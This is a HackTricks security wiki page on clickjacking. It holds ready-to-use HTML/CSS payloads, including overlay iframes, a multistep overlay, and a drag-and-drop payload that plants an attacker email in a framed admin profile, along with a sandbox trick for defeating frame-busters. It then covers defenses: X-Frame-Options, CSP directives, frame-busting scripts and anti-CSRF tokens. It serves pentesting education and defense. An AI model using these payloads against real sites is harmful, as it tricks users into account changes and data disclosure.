Clickjacking
tip
Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
What is Clickjacking
In a Clickjacking attack, a user is tricked into clicking an element on a web page that is either invisible or disguised as a different element. This manipulation can lead to unintended consequences for the user, such as downloading malware, being redirected to malicious web pages, handing over credentials or sensitive information, transferring money, or purchasing products online.
Prepopulate forms trick
Sometimes it is possible to fill the values of form fields using GET parameters when loading the page. An attacker can abuse this behaviour to fill a form with arbitrary data and send the clickjacking payload so that the user presses the Submit button.
Populate form with Drag&Drop
If you need the user to fill a form but you don't want to ask them directly to type some specific information (like an email or a specific password you know), you can just ask them to Drag&Drop something that will write your controlled data, as in this example.
Basic Payload
<style>
  /* The framed page is stacked above the decoy at 10% opacity, so the click lands on it */
  iframe {
    position: relative;
    width: 500px;
    height: 700px;
    opacity: 0.1;
    z-index: 2;
  }
  /* Decoy text positioned under the target element of the framed page */
  div {
    position: absolute;
    top: 470px;
    left: 60px;
    z-index: 1;
  }
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>
Multistep Payload
<style>
  iframe {
    position: relative;
    width: 500px;
    height: 500px;
    opacity: 0.1;
    z-index: 2;
  }
  /* Two decoys, one per click the framed page requires */
  .firstClick, .secondClick {
    position: absolute;
    top: 330px;
    left: 60px;
    z-index: 1;
  }
  .secondClick {
    left: 210px;
  }
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>
Drag&Drop + Click payload
<html>
  <head>
    <style>
      #payload {
        position: absolute;
        top: 20px;
      }
      iframe {
        width: 1000px;
        height: 675px;
        border: none;
      }
      .xss {
        position: fixed;
        background: #F00;
      }
    </style>
  </head>
  <body>
    <!-- Overlays marking the three steps the user is guided through -->
    <div style="height: 26px; width: 250px; left: 41.5%; top: 340px;" class="xss">.</div>
    <div style="height: 26px; width: 50px; left: 32%; top: 327px; background: #F8F;" class="xss">1. Click and press delete button</div>
    <div style="height: 30px; width: 50px; left: 60%; bottom: 40px; background: #F5F;" class="xss">3.Click me</div>
    <!-- Missing space between the style and src attributes in the original fixed -->
    <iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3" src="https://target.com/panel/administration/profile/"></iframe>
    <!-- Draggable element whose dataTransfer payload is dropped into the framed input -->
    <div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
  </body>
</html>
XSS + Clickjacking
If you have identified an XSS attack that requires a user to click on some element to trigger the XSS and the page is vulnerable to clickjacking, you could abuse it to trick the user into clicking the button/link.
Example:
You have found a self XSS in some private account details (details that only you can set and read). The page with the form to set these details is vulnerable to Clickjacking and you can prepopulate the form with GET parameters.
An attacker could prepare a Clickjacking attack against that page, prepopulating the form with the XSS payload and tricking the user into submitting the form. So, when the form is submitted with the modified values, the user will execute the XSS.
DoubleClickjacking
First explained in this post, this technique asks the victim to double click on a button of a custom page placed in a specific location, and uses the timing differences between the mousedown and onclick events to load the victim page during the double click, so the victim actually clicks a legitimate button in the victim page.
An example could be seen in this video: https://www.youtube.com/watch?v=4rGvRRMrD18
A code example can be found in this page.
warning
This technique allows tricking the user into clicking on one spot in the victim page while bypassing every protection against clickjacking. So the attacker needs to find sensitive actions that can be done with just one click, like OAuth prompts accepting permissions.
Browser extensions: DOM-based autofill clickjacking
Aside from iframing victim pages, attackers can target browser extension UI elements that are injected into the page. Password managers render autofill dropdowns near focused inputs; by focusing an attacker-controlled field and hiding/occluding the extension’s dropdown (opacity/overlay/top-layer tricks), a coerced user click can select a stored item and fill sensitive data into attacker-controlled inputs. This variant requires no iframe exposure and works entirely via DOM/CSS manipulation.
- For concrete techniques and PoCs see the DOM-based Extension Clickjacking write-up (marektoth.com) listed in the references.
Strategies to Mitigate Clickjacking
Client-Side Defenses
Scripts executed on the client side can perform actions to prevent Clickjacking:
- Ensuring the application window is the main or top window.
- Making all frames visible.
- Preventing clicks on invisible frames.
- Detecting and alerting users to potential Clickjacking attempts.
However, these frame-busting scripts can be bypassed:
- Browsers' Security Settings: Some browsers might block these scripts based on their security settings or lack of JavaScript support.
- HTML5 iframe sandbox Attribute: An attacker can neutralize frame buster scripts by setting the sandbox attribute with allow-forms or allow-scripts values without allow-top-navigation. This prevents the iframe from verifying if it is the top window, e.g.,
<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>
The allow-forms and allow-scripts values enable actions within the iframe while disabling top-level navigation. To ensure the intended functionality of the targeted site, additional permissions like allow-same-origin and allow-modals might be necessary, depending on the attack type. Browser console messages can guide which permissions to allow.
Server-side defenses
X-Frame-Options
The X-Frame-Options HTTP response header tells browsers whether a page may be rendered inside a <frame> or <iframe>:
- X-Frame-Options: deny - No domain can frame the content.
- X-Frame-Options: sameorigin - Only the same site can frame the content.
- X-Frame-Options: allow-from https://trusted.com - Only the specified 'uri' can frame the page.
- Note the limitations: if the browser does not support this directive, it may not work. Some browsers prefer the CSP frame-ancestors directive.
Content Security Policy (CSP) frame-ancestors directive
The frame-ancestors directive in CSP is the recommended method for Clickjacking protection:
- frame-ancestors 'none' - Similar to X-Frame-Options: deny.
- frame-ancestors 'self' - Similar to X-Frame-Options: sameorigin.
- frame-ancestors trusted.com - Similar to X-Frame-Options: allow-from.
For instance, the following CSP only allows framing from the same domain:
Content-Security-Policy: frame-ancestors 'self';
Further details and complex examples can be found in the frame-ancestors CSP documentation and Mozilla's CSP frame-ancestors documentation.
Content Security Policy (CSP) with child-src and frame-src
Content Security Policy (CSP) is a security measure that helps prevent Clickjacking and other code injection attacks by specifying which sources the browser should allow content to be loaded from.
frame-src Directive
- Defines valid sources for frames.
- More specific than the default-src directive.
Content-Security-Policy: frame-src 'self' https://trusted-website.com;
This policy allows frames from the same origin (self) and https://trusted-website.com.
child-src Directive
- Introduced in CSP level 2 to set valid sources for web workers and frames.
- Used as a fallback for frame-src and worker-src.
Content-Security-Policy: child-src 'self' https://trusted-website.com;
This policy allows frames and workers from the same origin (self) and https://trusted-website.com.
Usage notes:
- Deprecation: child-src is being phased out in favour of frame-src and worker-src.
- Fallback behaviour: If frame-src is absent, child-src is used as the fallback for frames. If both are absent, default-src is used.
- Strict source definition: Include only trusted sources in the directives to prevent exploitation.
JavaScript Frame-Breaking Scripts
Although not entirely foolproof, JavaScript-based frame-busting scripts can be used to prevent a web page from being framed. Example:
// If this window is not the top-level window, navigate the top window to this page
if (top !== self) {
top.location = self.location
}
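An added defensive variant (example code, not from the original page) that addresses the sandbox bypass described under Client-Side Defenses: the body is hidden by a style element by default and only revealed once the script confirms it is the top-level window, so if the top.location navigation is blocked (a sandboxed iframe without allow-top-navigation, or an onbeforeunload handler in the framing page) the page stays invisible instead of sitting clickable under an overlay. The decision logic is a pure function so it can be exercised outside a browser with stand-in window objects; the antiClickjack style id and the function names are assumptions.

```javascript
// Added example, not HackTricks' code: a hide-by-default frame buster.
// Expected markup in <head> (assumed, not from the original page):
//   <style id="antiClickjack">body { display: none !important; }</style>

// Pure decision: `win` is the real window or a stand-in exposing
// `self`, `top` and `location`. Returns what the page should do.
function decideFrameProtection(win) {
  if (win.self === win.top) {
    return { reveal: true, bustTo: null, reason: "top-level window" };
  }
  // Framed by another document: keep the body hidden and try to escape.
  return { reveal: false, bustTo: win.self.location.href, reason: "framed" };
}

// Apply the decision to a document. `doc` is the real document or a stand-in
// exposing getElementById. Returns the decision for inspection.
function applyFrameProtection(win, doc) {
  const decision = decideFrameProtection(win);
  if (decision.reveal) {
    // Safe to show the page: drop the blocking style element.
    const style = doc.getElementById("antiClickjack");
    if (style && style.parentNode) style.parentNode.removeChild(style);
    return decision;
  }
  try {
    // Navigation may throw or be silently ignored inside a sandboxed iframe
    // without allow-top-navigation; either way the body stays hidden.
    win.top.location = decision.bustTo;
  } catch (err) {
    // Deliberately ignored: the hidden body is the real protection.
  }
  return decision;
}

// Run automatically inside a browser; skipped under Node so the helpers can be tested.
if (typeof window !== "undefined" && typeof document !== "undefined") {
  applyFrameProtection(window, document);
}
```

The important design point is that the unhide step runs only on the success path: a frame buster that merely navigates away has nothing to fall back on when the navigation is suppressed, whereas this one fails closed.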
Employing Anti-CSRF Tokens
- Token validation: Use anti-CSRF tokens in web applications to ensure that state-changing requests are made intentionally by the user and not through a Clickjacked page.
References
- https://portswigger.net/web-security/clickjacking
- https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html
- DOM-based Extension Clickjacking (marektoth.com)